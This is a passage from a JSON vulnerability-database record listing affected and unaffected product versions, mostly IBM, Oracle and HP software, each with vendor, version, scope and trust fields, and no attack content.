"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2" }, { "model": "rational developer for system z if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "db2 connect enterprise edition fp11", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.19" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.13" }, { "model": "system networking rackswitch g8264", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "netezza platform software", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "emptoris strategic supply management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "s7700 v200r007sph003", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hp-ux apache-based web server", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "2.2.15.23" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.2" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.410" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.060" }, { "model": "release control 9.21p1", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.22" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.34" }, { "model": "infosphere optim performance manager for db2 on linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "oceanstor v100r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "db2\u00ae advanced enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.16" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "jrockit r28.2.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "emptoris sourcing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.2.6" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "system networking rackswitch g8316", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.100" }, { "model": "jrockit r27.6.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79550" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4.0.5" }, { "model": "db2\u00ae connect? unlimited edition for system i\u00ae", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.2" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073830" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.3" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.56" }, { "model": "infosphere optim performance manager for db2 on linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "data studio client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "websphere mq internet pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.25" }, { "model": "cognos business viewpoint if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.2" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "openpages grc platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.51" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.039" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli network manager ip edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.4" }, { "model": "license metric tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "service manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.33" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.2" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "flashsystem 9843-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "notes and domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11150-11" }, { "model": "java sdk sr8-fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "operations agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.13" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.026" }, { "model": "emptoris contract management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.54" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6.3.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.11.1" }, { "model": "megaraid storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.03.01.00" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "qradar siem patch ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.44" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.16" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "java sdk sr4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "tivoli key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "db2\u00ae connect? enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "jrockit r28.2.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.3" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "msr 50-g2 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.8" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "bsm connector", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.21" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079450" }, { "model": "rational lifecycle integration adapter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.2.1" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.12.4" }, { "model": "jrockit r27.6.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.19" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.4" }, { "model": "websphere partner gateway enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.040" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.6" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.6" }, { "model": "power systems 350.a0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xiv storage system gen", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "jrockit r27.6.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "infosphere identity insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "1/10gb uplink ethernet switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "powervc express edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.1" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1.8" }, { "model": "websphere lombardi edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.3" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88042590" }, { "model": "emptoris sourcing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.2.0" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7967" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.51" }, { "model": "idataplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79790" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "jdk update1", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5.4" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.06" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.24" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.44" }, { "model": "dataquant fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8.2.1" }, { "model": "java se embedded 7u75", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "spectrum scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "b2b advanced communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.2" }, { "model": "system networking rackswitch g8124-e", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.2" }, { "model": "financial transaction manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.8" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.12.0" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.071" }, { "model": "enterprise linux client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.12" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.16" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "sterling connect:enterprise for unix ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.0.3" }, { "model": "business process monitor", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.20" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.5" }, { "model": "rational software architect ifix1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4.2" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "infosphere discovery for zos", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7300" }, { "model": "infosphere optim performance manager for db2 on unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "integration designer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "msr1000 (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7)0" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4.1" }, { "model": "jre update21", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "tivoli continuous data protection for files", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "db2\u00ae workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.9" }, { "model": "packaging utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "tivoli security compliance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "data studio client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "db2\u00ae advanced enterprise server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.11" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.08" }, { "model": "rational directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.21" }, { "model": "msr20-1x (comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5)0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.037" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.7" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.45" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.0.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "powervc standard edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.2.2" }, { "model": "operations manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.8" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.3" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.2000" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "p6000 command view software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.3.3" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "abyp-10g-4lr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.13" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.6" }, { "model": "sparc enterprise m9000 xcp", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.205" }, { "model": "smartcloud orchestrator fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "db2 advanced enterprise server edition fp11", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "qradar siem mr2 patch ifi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.110" }, { "model": "data server runtime client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "hp-ux tomcat servlet engine", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5.5.36.02" }, { "model": "infosphere discovery for information integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.11.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "rational build forge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.6" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1881" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.18" }, { "model": "jre", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.4.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "abyp-0t-0s-4l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.62" }, { "model": "abyp-4t-0s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.41" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "infosphere data architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.12" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.1" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "db2 connect unlimited edition for system i fp6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "emptoris spend analysis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.10" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "sterling connect:direct browser ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.11.04" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "system networking rackswitch g8000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storediq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.13.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.41" }, { "model": "sametime community server hf1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "installation manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "business process monitor", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.03" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, 